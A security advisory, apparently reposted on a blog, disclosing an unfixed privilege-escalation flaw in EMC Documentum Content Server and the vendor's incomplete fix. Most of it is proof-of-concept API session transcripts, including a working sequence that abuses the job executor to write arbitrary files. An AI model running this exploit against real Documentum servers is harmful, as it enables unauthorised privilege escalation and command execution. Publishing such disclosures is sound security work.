Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed
On April 2014 I discovered vulnerability in EMC Documentum Content Server
which allow authenticated user to elevate privileges, hijack Content Server
filesystem or execute arbitrary commands by creating malicious dm_job
objects (for detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).
On October 2014 vendor announced ESA-2014-105 which was claiming that
vulnerability has been remediated.
On November 2014 fix was contested (there was significant delay after
ESA-2014-105 because vendor constantly fails to provide status of reported
vulnerabilities) by providing PoC similar to described in VRF#HUGC34JH.txt,
description provided to CERT/CC (another CNA was chosen because vendor
fails to communicate) was:
==============================
The problem is that non-privileged user is able to create dm_job objects and
execute corresponding docbase methods (some examples of "malicious" methods
are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN), the word "create" here
does mean some sequence of commands which result to existence of dm_job
object. PoC in VRF#HUFU6FNP describes attack on scheduler - scheduler does
not schedule jobs unless they are owned by superuser, so, the command
sequence in that case was: "create dm_job and update dm_job", EMC thinks
that they have fixed vulnerability, but they just fixed the sequence given
in PoC, another sequence is "create dm_sysobject, update dm_sysobject &
change dm_sysobject" - see VRF#HUGC34JH, it's already known attack.
Also, I could provide third PoC related to this report, but I do not think
that would be useful for EMC.
==============================
Current status of CVE-2014-4626 is obscure, last public status could be
found in CERT/CC spreadsheet (http://www.kb.cert.org/vuls/i
==============================
The new exploit is being tracked under PSRC-2494.
This is targeted for Q1 2015 (March patch).
==============================
Though latest builds of EMC Documentum Content Server successfully pass PoCs
described previously:
==============================
API> create,c,dm_job
...
08024be980006902
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_CANT_CHANGE_OW
"Must have system admin privileges or superuser privileges
to change the owner_name to 'dmadmin'."
API> create,c,dm_sysobject
...
08024be980006904
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
OK
API> ?,c,change dm_sysobject object to dm_job
where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal:
error has occurred for object 08024be980006904."
[DM_USER_E_NEED_SU_OR_SYS_FOR_
"The current user (test) needs to have superuser or sysadmin
privilege to create or save or destroy objects of type (dm_job)."
==============================
the vulnerability remains unfixed, below is a another PoC (job engine in
Documentum consists of two parts: scheduler and executor, previous attacks
were designed to exploit vulnerability in scheduler, this one demonstrates
how to exploit vulnerability in job executor):
==============================
API> create,c,dm_job
...
08024be98000690e
API> set,c,l,object_name
SET> malicious job
...
OK
API> set,c,l,inactivate_after_failu
SET> 0
...
OK
API> set,c,l,max_iterations
SET> 0
...
OK
API> set,c,l,method_name
SET> dm_file_writer
...
OK
API> set,c,l,pass_standard_argument
SET> 0
...
OK
API> set,c,l,run_interval
SET> 1
...
OK
API> set,c,l,run_mode
SET> 1
...
OK
API> set,c,l,run_now
SET> 1
...
OK
API> set,c,l,is_inactive
SET> 0
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> append,c,l,method_arguments
SET> /tmp/test.txt
...
OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability
...
OK
API> append,c,l,method_arguments
SET> CREATE
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,ag
ARGUMENTS,S,'
-docbase_name DCTM_DEV.DCTM_DEV
-docbase_owner dmadmin
-job_id 08024be98000690e
-log_directory /u01/documentum/cs/dba/log
-docbase_id 150505
-trace_level 10
'
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES
result : 0
process_id : 91436
launch_failed : F
method_return_val : 0
os_system_error : No Error
timed_out : F
time_out_length : 60
app_server_host_name :
app_server_port : 0
app_server_uri :
error_message :
SYSTEM ATTRIBUTES
APPLICATION ATTRIBUTES
INTERNAL ATTRIBUTES
API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
==============================
__
Regards,
Andrey B. Panfilov
Komentarų nėra:
Rašyti komentarą